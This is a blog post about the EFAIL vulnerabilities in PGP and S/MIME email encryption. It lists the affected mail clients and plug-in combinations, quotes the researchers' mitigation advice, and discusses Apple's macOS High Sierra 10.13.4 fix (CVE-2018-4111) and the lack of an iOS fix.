Fuller details have now been published about the EFAIL vulnerabilities in PGP and S/MIME email encryption, at the authors’ dedicated website.
They claim that S/MIME encryption provided by Apple Mail, MailMate, Airmail, and Apple’s Mail on iOS, together with Microsoft Outlook and Thunderbird have been vulnerable, without any PGP installation. Additionally, the combinations of Apple Mail or Airmail with GPGTools, and Thunderbird with Enigmail, have also been vulnerable. Apple’s Mail, whether running on macOS or iOS, has also been vulnerable to direct exfiltration attack without user interaction.
If you use S/MIME or PGP encryption in any of those combinations, then you are most probably affected, and would be well advised to re-assess your risks.
As to mitigation strategies, the authors consider that “the best way to prevent EFAIL attacks is to only decrypt S/MIME or PGP emails in a separate application outside of your email client.” I don’t know how feasible that would be using, for example, Apple’s Mail app.
Regarding the strategy of disabling HTML rendering, they state “disabling the presentation of incoming HTML emails in your email client will close the most prominent way of attacking EFAIL”, but that does not solve all the problems. In the case of Apple’s Mail, it would appear to still leave encrypted messages vulnerable: “Apple Mail, iOS Mail and Mozilla Thunderbird had even more severe implementation flaws allowing direct exfiltration of the plaintext that is technically very easy to execute.”
Apple has been informed of these vulnerabilities on 15 Nov 2017 and 10 Feb 2018. It appears that macOS High Sierra 10.13.4 does address direct exfiltration of S/MIME email, with the following fix now reported in its security release notes:
Available for: macOS High Sierra 10.13.3
Impact: An attacker in a privileged network position may be able to exfiltrate the contents of S/MIME-encrypted e-mail
Description: An issue existed in the handling of S/MIME HTML e-mail. This issue was addressed by not loading remote resources on S/MIME encrypted messages by default if the message has an invalid or missing S/MIME signature.
CVE-2018-4111: Damian Poddebniak of Münster University of Applied Sciences, Christian Dresen of Münster University of Applied Sciences, Jens Müller of Ruhr University Bochum, Fabian Ising of Münster University of Applied Sciences, Sebastian Schinzel of Münster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, Jörg Schwenk of Ruhr University Bochum
Entry updated April 13, 2018
As of 0600 UTC on 15 May 2018, I cannot find any corresponding fix for iOS.
If you are affected by these vulnerabilities, then you will clearly need to make your own assessment of your risks and best mitigation strategy. However, it does appear that Apple has responded to the most severe bug in macOS Mail, and has at least mitigated the risk in using S/MIME in High Sierra’s Mail app. The situation with iOS Mail, and macOS apps which use PGP encryption seems less clear at present.